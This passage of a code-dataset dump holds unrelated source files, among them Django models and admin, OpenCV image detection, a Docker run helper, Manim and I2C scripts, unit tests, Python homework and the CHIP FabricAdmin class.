import unicode_literals\n\nfrom django.db import models, migrations\nfrom data_app.models import Movie, Rating, User\nimport pandas as pd\n\n\ndef load_movie_data(apps, schema_editor):\n    datus = pd.read_csv('some_data/movies.dat', encoding='windows-1252',\n                        sep='::', engine='python',\n                        names=[\"id\", \"title\", 'genres'])\n\n    for row in datus.iterrows():\n        movie_object = row[1]\n        Movie.objects.create(m_id=movie_object.id,\n                             title=movie_object.title,\n                             genres=movie_object.genres)\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('data_app', '0003_auto_20150701_0401'),\n    ]\n\n    operations = [\n        migrations.RunPython(load_movie_data)\n    ]\n","sub_path":"movieratings/data_app/migrations/0004_auto_20150701_0402.py","file_name":"0004_auto_20150701_0402.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"30072135","text":"import json\nimport numpy as np\nfrom sklearn.manifold import TSNE\nfrom sklearn.metrics import confusion_matrix\n\n# method that loads necessary data from json\n# model: \"bidir_dag_lstm\" or \"gs_lstm\"\n# dataset: \"train\" or \"validate\" or \"test\"\n# analysis: \"accuracy\" or \"entity\"\ndef load_data (model, dataset):\n\n    if model == \"randomforest\":\n        data_path = \"./bidir_dag_lstm_result/random_forest/result_raw.json\"\n    else:\n        data_path = \"../result/\" + model + \"/logs/\" + dataset + \"/result.json\"\n    \n    print(\"Fetching data from \" + data_path)\n\n    with open(data_path) as f:\n        json_file = json.load(f)\n\n    answer = json_file[\"answer\"]\n    output = json_file[\"output\"]\n    entity = json_file[\"entity\"]\n    return (answer, output, entity)\n\ndef get_tsne (entity):\n    X = np.asarray(entity)\n    # print(\"entity has a shape of\", X.shape)\n\n    model = TSNE(learning_rate = 100)\n    # print(\"calculating TSNE...\")\n    transformed = model.fit_transform(X)\n\n    return transformed.tolist()\n\n\ndef get_label_frequency():\n\n    binary_train = \"../result/binary/logs/train/result.json\"\n    binary_test = \"../result/binary/logs/test/result.json\"\n    multi_train = \"../result/multi/logs/train/result.json\"\n    multi_test = \"../result/multi/logs/test/result.json\"\n    path_list =[binary_train, binary_test, multi_train, multi_test]\n\n    result = {}\n    for p in 
path_list:\n        with open(p) as f:\n            json_file = json.load(f)\n        \n        answer = json_file[\"answer\"]\n        label = set(answer)\n\n        freq = {}\n        for l in label:\n            temp = answer.count(l)\n            freq[str(l)] = temp\n        \n        result[p] = freq\n\n    return result\n\ndef analyze(model, dataset):\n    print(\"working on \" + model)\n\n    answer, output, entity = load_data(model, dataset)\n    # confusion_matrix = get_confusion_matrix(answer, output)\n    # normalized_conf = normalize_confusion_matrix(confusion_matrix)\n    tsne_values = get_tsne(entity)\n\n    result = {}\n\n    result[\"answer\"] = answer\n    result[\"output\"] = output\n    result[\"tsne\"] = tsne_values\n\n    if model == \"randomforest\":\n        path = \"./bidir_dag_lstm_result/random_forest/\" + dataset + \"/result.json\"\n    else:\n        path = \"./bidir_dag_lstm_result/\" + model + \"/\" + dataset + \"/result.json\"\n\n    with open(path, 'w') as f:\n        json.dump(result, f)\n\n\nif __name__ == \"__main__\":\n\n    # model = [\"binary\", \"multi\"]\n    # dataset = [\"train\", \"test\"]\n    \n    # for i in range(len(model)):\n    #     m = model[i]\n    #     analyze(m, dataset[1])\n\n    # analyze(model='randomforest', dataset='test')\n    \n    result = get_label_frequency()\n    print(result)\n","sub_path":"visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307789455","text":"import cv2\nimport numpy as np\n\ndef detection1(file_path, debug=False):\n    '''\n    Determine the presence of fingers in an image for a given file path\n\n    Positional arguments:\n    file_path -- path to image file\n    \n    Keyword arguments:\n    debug -- if True, show images of the various steps with contours added (default False)\n\n    Returns:\n    List of ellipses that match criteria\n    '''\n    image = cv2.imread(file_path, 1)\n\n    # convert to greyscale colour domain\n    grey = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n    # denoising techniques\n\n    # adaptive thresholding\n    ADAPTIVE_THRESHOLD_BLOCK_SIZE = 121\n    ADAPTIVE_THRESHOLD_C_VAL = 10\n\n    thresh = cv2.adaptiveThreshold(grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n                                   cv2.THRESH_BINARY_INV, \n                                   ADAPTIVE_THRESHOLD_BLOCK_SIZE, \n                                   ADAPTIVE_THRESHOLD_C_VAL)\n    \n    # applying morphological transformations: closing followed by opening\n    CLOSING_KERNEL = np.ones((5, 5), np.float32)/25\n    OPENING_KERNEL = np.ones((5, 5), np.float32)/25\n\n    closed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, CLOSING_KERNEL)\n    opened = cv2.morphologyEx(closed, cv2.MORPH_OPEN, OPENING_KERNEL)\n\n    # find contours\n    contours, hierarchy = cv2.findContours(opened,\n                                           cv2.RETR_TREE,\n                                           cv2.CHAIN_APPROX_SIMPLE)\n\n    # limit contours based on the height and width dimensions of matching ellipses\n    DIMENSION_THRESHOLD_LOWER = 15\n    DIMENSION_THRESHOLD_UPPER = 200\n\n    ellipse_list = []\n\n    for contour in contours:\n        if len(contour) >= 5:\n            ellipse = cv2.fitEllipse(contour)\n            if (ellipse[1][0] > DIMENSION_THRESHOLD_LOWER and \n                ellipse[1][0] < DIMENSION_THRESHOLD_UPPER and\n                ellipse[1][1] > DIMENSION_THRESHOLD_LOWER and\n                ellipse[1][1] < DIMENSION_THRESHOLD_UPPER):\n                ellipse_list.append(ellipse)\n\n    if debug:\n        original = image[:].copy()\n        cv2.imshow('thresh', thresh)\n\n        cv2.drawContours(image, contours, -1, (0, 255, 0), 3)\n\n        for ellipse in ellipse_list:\n            cv2.ellipse(image, ellipse, (0, 0, 255), 3)\n\n        cv2.imshow('closed', closed)\n        cv2.imshow('opened', opened)\n        final = np.hstack((original, image))\n        cv2.imshow('final', final)\n        cv2.waitKey(0)\n        modified_file_path = file_path.split('.')[0] + '_modified.png'\n        
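# uncomment to save the side-by-side comparison image:\n        # 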
cv2.imwrite(modified_file_path, final)\n        cv2.destroyAllWindows()\n\n    return ellipse_list\n\n\nif __name__ == '__main__':\n    from glob import glob\n    samples = glob('capture*.png')\n\n    for sample in samples:\n        detection1(sample, debug=True)\n","sub_path":"cvTests/detection1.py","file_name":"detection1.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359842441","text":"class Character():\n\tdef __init__(self):\n\t\tself.name = ''\n\t\tself.gender = ''\n\t\tself.job = ''\n\t\tself.level = 0\n\t\tself.equipment = []\n\t\tself.inventory = []\n\t\tself.skills = []\n\n\tdef changeWeapon(self, equip):\n\t\tself.equipment[0] = equip\n\n\tdef changeHead(self, equip):\n\t\tself.equipment[1] = equip\n\n\tdef changeArmor(self, equip):\n\t\tself.equipment[2] = equip\n\n\tdef addSkill(self, skill):\n\t\tself.skills.append(skill)\n\n\tdef save(self):\n\t\tdata = [self.name, self.gender, self.job, self.level, self.equipment, self.inventory, self.skills]\n\t\tindex = 0\n\t\twith open('character.save', 'w') as file:\n\t\t\tfor i in data:\n\t\t\t\tif index < 4:\n\t\t\t\t\tfile.write(str(i)+'\\n')\n\t\t\t\tif index == 4:\n\t\t\t\t\tfile.write('EQUIPMENT\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tif index == 5:\n\t\t\t\t\tfile.write('INVENTORY\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tif index == 6:\n\t\t\t\t\tfile.write('SKILLS\\n')\n\t\t\t\t\tfor element in i:\n\t\t\t\t\t\tfile.write(str(element)+'\\n')\n\t\t\t\tindex += 1\n\n\tdef load(self):\n\t\tflag = 'none'\n\t\tindex = 0\n\t\twith open('character.save', 'r') as file:\n\t\t\tdata = file.read().splitlines()\n\t\t\tfor i in data:\n\t\t\t\tif index == 0:\n\t\t\t\t\tself.name = i\n\t\t\t\tif index == 1:\n\t\t\t\t\tself.gender = i\n\t\t\t\tif index == 2:\n\t\t\t\t\tself.job = i\n\t\t\t\tif index == 3:\n\t\t\t\t\tself.level = int(i)\n\t\t\t\tif index > 3:\n\t\t\t\t\tif i == 'EQUIPMENT':\n\t\t\t\t\t\tflag = 'eq'\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif i == 'INVENTORY':\n\t\t\t\t\t\tflag = 'inv'\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif i == 'SKILLS':\n\t\t\t\t\t\tflag = 'sk'\n\t\t\t\t\t\tcontinue\n\t\t\t\tif flag == 'eq':\n\t\t\t\t\tself.equipment.append(i)\n\t\t\t\tif flag == 'inv':\n\t\t\t\t\tself.inventory.append(i)\n\t\t\t\tif flag == 'sk':\n\t\t\t\t\tself.skills.append(i)\n\t\t\t\tindex += 1\n\n\t# This is for testing purposes\n\tdef printData(self):\n\t\tprint(\"\\nThis is your character:\")\n\t\tprint(\"Name: \" + self.name)\n\t\tprint(\"Gender: \" + self.gender)\n\t\tprint(\"Class: \" + self.job)\n\t\tprint(\"Level: \" + str(self.level))\n\t\tprint(\"Equipment: \" + str(self.equipment))\n\t\tprint(\"Inventory: \" + str(self.inventory))\n\t\tprint(\"Skills: \" + str(self.skills))\n\t\tprint(\"\")\n\t\t\n","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"277926800","text":"#!/usr/bin/env python\n# Run a Docker container with secrets injected (local)\nimport argparse\nimport subprocess\n\n# How to use argparse\n# 1. create an ArgumentParser object ----> parser = argparse.ArgumentParser()\n# 2. add arguments ----> parser.add_argument()\n\n# Create the ArgumentParser object\nparser = argparse.ArgumentParser()\n\n# Specify how each CLI argument should be parsed\nparser.add_argument(\n    \"cmd\",\n    type=str, # cast the CLI input (a string by default) to this type\n    nargs=argparse.REMAINDER # number of arguments: capture every remaining CLI token\n
)\n\n# Parse the CLI according to the rules added above\nargs = parser.parse_args()\n\nDOCKER_OPTIONS = [\n    ('--rm', ''),\n    ('-it', ''),\n    ('-d', ''),\n    ('-p', '8001:80'), # map host port 8001 to port 80 inside the container\n    ('--name', 'instagram'),\n]\n\nDOCKER_IMAGE_TAG = 'eqfwcev123/docker-wps12'\n\n# Write the requirements.txt used during docker build via poetry export\nsubprocess.run('poetry export -f requirements.txt > requirements.txt', shell=True)\n\n# Build the Docker image (an image without secrets.json)\nsubprocess.run(f'docker build -t {DOCKER_IMAGE_TAG} -f Dockerfile .', shell=True)\n# Stop any already-running container named instagram\nsubprocess.run('docker stop instagram', shell=True)\n\n# docker run starts bash without secrets.json -> the container goes to the background\n# Run the image built above\nsubprocess.run('docker run {options} {tag} /bin/bash'.format(\n    options=' '.join([\n        f'{key} {value}' for key, value in DOCKER_OPTIONS\n    ]),\n    tag=DOCKER_IMAGE_TAG,\n), shell=True)\n\n# Copy secrets.json into the running container, into the /srv/instagram directory inside the instagram container\nsubprocess.run('docker cp secrets.json instagram:/srv/instagram', shell=True)\n\n# Run collectstatic automatically using subprocess.run\nsubprocess.run('docker exec -it instagram ./manage.py collectstatic', shell=True)\n\n# In the running instagram container, execute the cmd received via argparse, or the default supervisord command (foreground mode)\nsubprocess.run('docker exec -it instagram {cmd}'.format(\n    cmd=' '.join(args.cmd) if args.cmd else 'supervisord -c ../.config/supervisord.conf -n'\n), shell=True)\n","sub_path":"docker-run-secrets.py","file_name":"docker-run-secrets.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"118883013","text":"from manimlib.imports import *\n\n\"\"\"Recode the entire thing. It doesn't work at all\"\"\"\n\nclass DoublePendulum(Scene):\n    CONFIG = {\n        'm1': 1,\n        'dot1': Dot(),\n        'line1': Line(),\n        'l1': 1,\n        'theta1': PI/2,\n        'v1': 0,\n\n        'm2': 2,\n        'dot2': Dot(),\n        'line2': Line(),\n        'l2': 1,\n        'theta2': PI/2,\n        'v2': 0,\n        'g': 1\n    }\n    def update(self):\n        num1 = -self.g*(2*self.m1 + self.m2)*np.sin(self.theta1)\n        num2 = -self.m2*self.g*np.sin(self.theta1 - 2*self.theta2)\n        num3 = 2*np.sin(self.theta1 - self.theta2)*self.m2\n        num4 = (self.v2 ** 2) * self.l2 + (self.v1 ** 2) * self.l1 * np.cos(self.theta1 - self.theta2)\n        den = self.l1 * (2*self.m1 + self.m2 - self.m2*np.cos(2*(self.theta1 - self.theta2)))\n        a1 = (num1 + num2 + num3 * num4) / den\n\n        self.v1 += a1 * 0.001\n        self.theta1 += self.v1\n\n        self.dot1.move_to(RIGHT * self.l1 * np.sin(self.theta1) + DOWN * self.l1 * np.cos(self.theta1))\n        self.line1.put_start_and_end_on(ORIGIN, self.dot1.get_center())\n        self.dot2.move_to(self.dot1.get_center() + RIGHT * self.l2 * np.sin(self.theta2) + DOWN * self.l2 * np.cos(self.theta2))\n        self.line2.put_start_and_end_on(self.dot1.get_center(), self.dot2.get_center())\n\n    def construct(self):\n        self.dot1.move_to(RIGHT * self.l1 * np.sin(self.theta1) + DOWN * self.l1 * np.cos(self.theta1))\n        self.dot2.move_to(self.dot1.get_center() + RIGHT * self.l2 * np.sin(self.theta2) + DOWN * self.l2 * np.cos(self.theta2))\n\n        self.line1.put_start_and_end_on(ORIGIN, self.dot1.get_center())\n        self.line2.put_start_and_end_on(self.dot1.get_center(), self.dot2.get_center())\n\n        self.add(self.dot1, self.dot2, self.line1, self.line2)\n        self.wait(1)\n        self.dot1.add_updater(lambda d: self.update())\n        
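# the updater added above advances the simulation during the wait below\n        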
self.wait(5)\n","sub_path":"Projects/Tests/ChaoticPendulums.py","file_name":"ChaoticPendulums.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610956190","text":"from quick2wire.i2c import I2CMaster, writing_bytes, reading\nimport time\n\nimport struct\nfrom collections import namedtuple\n\naddress = 0x04\n\nif __name__==\"__main__\":\t\t\n\twith I2CMaster() as master:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tvalue = int(str(input(\"Enter 0 - 255:\")).strip())\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tmaster.transaction(writing_bytes(address,value))\n\t\t\ttime.sleep(1)\n\t\t\t\n\t\t\tsensors = master.transaction(reading(address, 8))[0]\n\t\t\tprint(sensors)\n\t\t\tSensors = namedtuple(\"Sensors\", \"A0 A1 A2 A3\")\n\t\t\ts = Sensors._make(struct.unpack(\"\" ))\n \n # Opt 1; comment this out to run Opt 2 or 3\n #d = digit_sum(nums)\n \n # Opt 2; comment this out to run Opt 1 or 3\n [ digit_sum(num) for num in [ map(int,str(nums)) ] ]\n \n \n \n \nif __name__ == \"__main__\": main()","sub_path":"Exercises/Sections-2_2-2_10/ex-2_6-sum-of-ints.py","file_name":"ex-2_6-sum-of-ints.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"632872925","text":"from custom.ilsgateway.tanzania.reminders import ARRIVED_HELP, ARRIVED_DEFAULT, ARRIVED_KNOWN\nfrom custom.ilsgateway.tests.handlers.utils import ILSTestScript\n\n\nclass ILSArrivedTest(ILSTestScript):\n\n def setUp(self):\n super(ILSArrivedTest, self).setUp()\n self.user_fac1.language = 'en'\n self.user_fac1.save()\n\n def test_arrived_help(self):\n msg = \"\"\"\n 5551234 > arrived\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_HELP))\n self.run_script(msg)\n\n def test_arrived_unknown_code(self):\n msg = \"\"\"\n 5551234 > arrived NOTACODEINTHESYSTEM\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_DEFAULT))\n self.run_script(msg)\n\n def test_arrived_known_code(self):\n msg = \"\"\"\n 5551234 > arrived loc1\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_KNOWN) % {'facility': self.loc1.name})\n self.run_script(msg)\n\n def test_arrived_with_time(self):\n msg = \"\"\"\n 5551234 > arrived loc1 10:00\n 5551234 < {0}\n \"\"\".format(unicode(ARRIVED_KNOWN % {'facility': self.loc1.name}))\n self.run_script(msg)\n","sub_path":"custom/ilsgateway/tests/handlers/arrived.py","file_name":"arrived.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566380305","text":"from unittest import mock\n\nfrom jsonapi_requests import data\nfrom jsonapi_requests import orm\n\n\nclass TestField:\n def test_field_equivalence(self):\n import uuid\n\n class UuidField(orm.AttributeField):\n def deserialize(self, json_value):\n return uuid.UUID(json_value)\n\n def serialize(self, value):\n return str(value)\n\n class Test(orm.ApiModel):\n class Meta:\n type = 'test'\n value = UuidField(source='value')\n\n test = Test()\n val = uuid.uuid4()\n test.value = val\n assert test.value is val\n\n def test_custom_field_serialization(self):\n mock_api = mock.MagicMock()\n mock_api.endpoint.return_value.post.return_value.status_code = 201\n mock_api.endpoint.return_value.post.return_value.content.data = data.JsonApiObject(\n type='test',\n id='123',\n attributes={'name': 'alice', 'extra': '0x1000'}\n )\n orm_api = orm.OrmApi(mock_api)\n\n class 
HexField(orm.AttributeField):\n            def deserialize(self, json_value):\n                return int(json_value, 16)\n\n            def serialize(self, value):\n                return hex(value)\n\n        hex_field = HexField(source='extra')\n\n        # NOTE: assert_not_called() isn't used for py3.4 compatibility in this test\n        decode_spy = mock.patch.object(HexField, 'deserialize', wraps=hex_field.deserialize).start()\n        encode_spy = mock.patch.object(HexField, 'serialize', wraps=hex_field.serialize).start()\n\n        class Test(orm.ApiModel):\n            class Meta:\n                api = orm_api\n                type = 'test'\n            name = orm.AttributeField(source='name')\n            extra = hex_field\n\n        test = Test()\n        test.name = 'alice'\n        test.extra = 1024\n        assert test.extra == 1024\n\n        # verify that we can successfully change the value and re-read it\n        test.extra = 2048\n        assert test.extra == 2048\n\n        # nothing should have been decoded at this point -- the reads (for assert) should have been cached\n        assert not decode_spy.called\n        # should have done an encode for each set\n        encode_spy.assert_has_calls([mock.call(1024), mock.call(2048)], any_order=False)\n        encode_spy.reset_mock()\n\n        test.save()\n\n        mock_api.endpoint.return_value.post.assert_called_with(\n            object=data.JsonApiObject.from_data(\n                {\n                    'type': 'test',\n                    'attributes': {'name': 'alice', 'extra': '0x800'}\n                }\n            )\n        )\n\n        # no further encoding/decoding should have happened\n        decode_spy.assert_has_calls([])\n        encode_spy.assert_has_calls([])\n\n        # verify that the new value that the API returned was set and decoded properly\n        assert test.extra == 4096\n        decode_spy.assert_called_once_with('0x1000')\n        decode_spy.reset_mock()\n\n        # read the property again but check that we didn't re-decode it\n        assert test.extra == 4096\n        assert not decode_spy.called\n","sub_path":"tests/test_field.py","file_name":"test_field.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397873510","text":"# Task 1:\n# Print the lowercase characters that sit around\n# one or more uppercase characters.\n# I.e. from the string \"mtMmEZUOmcq\" you should get ['mt', 'm', 'mcq']\n# Solve the task in two ways: with re and without.\n\"\"\"\n# with re\n\nimport re\n\nfoo = \"mtMmEZUOmcq\"\nlow_foo = re.findall(r\"([a-z]+)\", foo)\nprint(low_foo)\n\n# without re\n\nbar = \"mtMmEZUOmcq\"\nbar = list(bar)\nfor letters in bar:\n    if letters.isupper():\n        bar[bar.index(letters)] = \".\"\nbar = ''.join(bar)\nbar = bar.split(\".\")\nlower_letters = [letters_lower for letters_lower in bar if letters_lower.islower()]\nprint(lower_letters)\n\"\"\"\n\n# Task 2:\n# Print the uppercase characters that have\n# two lowercase characters on their left and two uppercase characters on their right.\n# I.e. 
from the string\n# \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\n# you should get the list of strings: ['AY', 'NOGI', 'P']\n# Solve the task in two ways: with re and without.\n\"\"\"\nimport re\n\nletters = \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\npattern = (r\"[a-z]{2}([A-Z]+)[A-Z]{2}\")\nnew_letters = re.findall(pattern, letters)\nprint(new_letters)\n\"\"\"\n\n# without re (tried the same approach as in task 1 =) )\n\nbar = \"GAMkgAYEOmHBSQsSUHKvSfbmxULaysmNOGIPHpEMujalpPLNzRWXfwHQqwksrFeipEUlTLec\"\nbar = list(bar)\nfor letters in bar:\n    if letters.islower():\n        bar[bar.index(letters)] = \".\"\nbar = ''.join(bar)\nbar = bar.split(\".\")\nisupper_letters = [letters_isupper for letters_isupper in bar if letters_isupper.isupper()]\nprint(isupper_letters)\n\n\n\n# Task 3:\n# Write a script that fills a chosen file (pick the file name yourself)\n# with arbitrary integer digits; as a result the file should contain\n# an arbitrary 2500-digit number.\n# Find and print the longest sequence of identical digits\n# in the file filled above.\n\n","sub_path":"lesson_04/home_work/hw04_normal.py","file_name":"hw04_normal.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296311558","text":"#\n# Copyright (c) 2021 Project CHIP Authors\n# All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# Needed to use types in type hints before they are fully defined.\nfrom __future__ import annotations\n\nimport ctypes\nfrom dataclasses import dataclass, field\nfrom typing import *\nfrom ctypes import *\nfrom rich.pretty import pprint\nimport json\nimport logging\nimport builtins\nimport base64\nimport chip.exceptions\nfrom chip import ChipDeviceCtrl\nimport copy\n\n\nclass FabricAdmin:\n    ''' Administers a specific fabric as identified by the tuple of RCAC subject public key and Fabric ID.\n        The Fabric ID can be passed into the constructor while the RCAC and ICAC are generated.\n        The Fabric ID *does not* have to be unique across multiple FabricAdmin instances as\n        it is scoped to the key pair used by the root CA and whose public key is in the RCAC.\n\n        Each admin is identified by an 'admin index' that is unique to the running\n        process. This is used to store credential information to disk so that\n        it can be easily loaded later if necessary (see 'Persistence' below for more details)\n\n        When vending ChipDeviceController instances on a given fabric, each controller instance\n        is associated with a unique fabric index. In the underlying FabricTable, each FabricInfo\n        instance can be treated as a unique identity that can collide on the same logical fabric.\n\n        >> C++ Binding Details\n\n        Each instance of the fabric admin is associated with a single instance\n        of the OperationalCredentialsAdapter. 
This adapter instance implements\n the OperationalCredentialsDelegate and is meant to provide a Python\n adapter to the functions in that delegate so that the fabric admin\n can in turn, provide users the ability to generate their own NOCs for devices\n on the network (not implemented yet). For now, it relies on the in-built\n ExampleOperationalCredentialsIssuer to do that.\n\n TODO: Add support for FabricAdmin to permit callers to hook up their own GenerateNOC\n logic.\n\n >> Persistence\n\n Specifically, each instance persists its fabric ID and admin\n index to storage. This is in addition to the persistence built into the ExampleOperationalCredentialsIssuer that persists details\n about the RCAC/ICAC and associated keys as well. This facilitates re-construction of a fabric admin on subsequent\n boot for a given fabric and ensuring it automatically picks up the right ICAC/RCAC details as well.\n '''\n\n activeAdminIndexList = set()\n activeAdmins = set()\n\n @classmethod\n def _Handle(cls):\n return chip.native.GetLibraryHandle()\n\n def AllocateNextAdminIndex(self):\n ''' Allocate the next un-used admin index.\n '''\n nextAdminIndex = 1\n while nextAdminIndex in FabricAdmin.activeAdminIndexList:\n nextAdminIndex = nextAdminIndex + 1\n return nextAdminIndex\n\n def __init__(self, vendorId: int, adminIndex: int = None, fabricId: int = 1):\n ''' Creates a valid FabricAdmin object with valid RCAC/ICAC, and registers itself as an OperationalCredentialsDelegate\n for other parts of the system (notably, DeviceController) to vend NOCs.\n\n vendorId: Valid operational Vendor ID associated with this fabric.\n adminIndex: Local index to be associated with this fabric. This is NOT the fabric index. Each controller on the fabric\n is assigned a unique fabric index.\n\n If omitted, one will be automatically assigned.\n\n fabricId: Fabric ID to be associated with this fabric. 
This is scoped to the public key of the resultant\n root generated by the underlying ExampleOperationalCredentialsIssuer.\n '''\n self._handle = chip.native.GetLibraryHandle()\n\n if (vendorId is None or vendorId == 0):\n raise ValueError(\n f\"Invalid VendorID ({vendorId}) provided!\")\n\n self._vendorId = vendorId\n self._fabricId = fabricId\n\n if (adminIndex is None):\n self._adminIndex = self.AllocateNextAdminIndex()\n else:\n if (adminIndex in FabricAdmin.activeAdminIndexList):\n raise ValueError(\n f\"AdminIndex {adminIndex} is already being managed by an existing FabricAdmin object!\")\n\n self._adminIndex = adminIndex\n\n FabricAdmin.activeAdminIndexList.add(self._adminIndex)\n\n print(\n f\"New FabricAdmin: FabricId: 0x{self._fabricId:016X}, AdminIndex: {self._adminIndex}, VendorId = 0x{self.vendorId:04X}\")\n self._Handle().pychip_OpCreds_InitializeDelegate.restype = c_void_p\n\n self.closure = builtins.chipStack.Call(\n lambda: self._Handle().pychip_OpCreds_InitializeDelegate(\n ctypes.py_object(self), ctypes.c_uint32(self._adminIndex))\n )\n\n if (self.closure is None):\n raise ValueError(\"Encountered error initializing OpCreds adapter\")\n\n #\n # Persist details to storage (read modify write).\n #\n try:\n adminList = builtins.chipStack.GetStorageManager().GetReplKey('fabricAdmins')\n except KeyError:\n adminList = {str(self._adminIndex): {'fabricId': self._fabricId}}\n builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n adminList[str(self._adminIndex)] = {'fabricId': self._fabricId, 'vendorId': self.vendorId}\n builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n self._isActive = True\n self.nextControllerId = 112233\n\n FabricAdmin.activeAdmins.add(self)\n\n def NewController(self, nodeId: int = None, paaTrustStorePath: str = \"\", useTestCommissioner: bool = False):\n ''' Vend a new controller on this fabric seeded with the right fabric details.\n '''\n if (not(self._isActive)):\n raise RuntimeError(\n f\"FabricAdmin object was previously shutdown and is no longer valid!\")\n\n if (nodeId is None):\n nodeId = self.nextControllerId\n self.nextControllerId = self.nextControllerId + 1\n\n print(\n f\"Allocating new controller with FabricId: 0x{self._fabricId:016X}, NodeId: 0x{nodeId:016X}\")\n\n controller = ChipDeviceCtrl.ChipDeviceController(\n self.closure, self._fabricId, nodeId, self.vendorId, paaTrustStorePath, useTestCommissioner, fabricAdmin=self)\n return controller\n\n def ShutdownAll():\n ''' Shuts down all active fabrics, but without deleting them from storage.\n '''\n activeAdmins = copy.copy(FabricAdmin.activeAdmins)\n\n for admin in activeAdmins:\n admin.Shutdown(False)\n\n FabricAdmin.activeAdmins.clear()\n\n def Shutdown(self, deleteFromStorage: bool = True):\n ''' Shutdown this fabric and free up its resources. 
This is important since relying\n            solely on the destructor will not guarantee relinquishing of C++-side resources.\n\n            deleteFromStorage: Whether to delete this fabric's details from persistent storage.\n        '''\n        if (self._isActive):\n            builtins.chipStack.Call(\n                lambda: self._Handle().pychip_OpCreds_FreeDelegate(\n                    ctypes.c_void_p(self.closure))\n            )\n\n            FabricAdmin.activeAdminIndexList.remove(self._adminIndex)\n\n            if (deleteFromStorage):\n                adminList = builtins.chipStack.GetStorageManager().GetReplKey('fabricAdmins')\n                del(adminList[str(self._adminIndex)])\n                if (len(adminList) == 0):\n                    adminList = None\n\n                builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n            FabricAdmin.activeAdmins.remove(self)\n            self._isActive = False\n\n    def __del__(self):\n        self.Shutdown(False)\n\n    @property\n    def vendorId(self) -> int:\n        return self._vendorId\n\n    @property\n    def fabricId(self) -> int:\n        return self._fabricId\n\n    @property\n    def adminIndex(self) -> int:\n        return self._adminIndex\n","sub_path":"src/controller/python/chip/FabricAdmin.py","file_name":"FabricAdmin.py","file_ext":"py","file_size_in_byte":8796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477659532","text":"from django.contrib import admin\n\nfrom .models import * \nfrom django.http.response import HttpResponseRedirect\n\n# Register your models here.\n\nclass ItemInline(admin.TabularInline):\n    model = Item\n    fields = [\n        ('product', 'quantity'),\n    ]\n\nclass OrderAdmin(admin.ModelAdmin):\n    change_form_template = 'admin/change_form.html'\n    inlines = [ItemInline]\n    fieldsets = (\n        ('Покупатель', {'fields': ['user']}),\n        ('Детали заказа', {'fields': \n            [\n\t    ('order_source'),\n            ('name' , 'phone', 'address',), \n            ('delivery', 'payment'),\n            'delivery_discount_use',\n            'coupon',\n            'status', \n            ('bonus_gained', 'user_append_bonus',),\n            'bonus_used', \n            'amount', \n            ]}),\n    )\n    autocomplete_fields = ['user',]\n\n    list_display = ['user_info', 'created_at', 'status', 'amount']\n\n    def user_info(self, obj):\n        current_user = obj.user\n        if (current_user):\n            source = ''\n            if obj.order_source:\n                source += obj.get_order_source_display() + ', '\n            return source + current_user.name + ', ' + current_user.phone\n        else:\n            result = ''\n            if obj.order_source:\n                result += obj.get_order_source_display() + ', '\n            return result + 'Не авторизованный пользователь'\n\n\n    def get_form(self, request, obj=None, change=False, **kwargs):\n        form = super().get_form(request, obj, change, **kwargs)\n        form.base_fields['user'].label = 'Клиент'\n        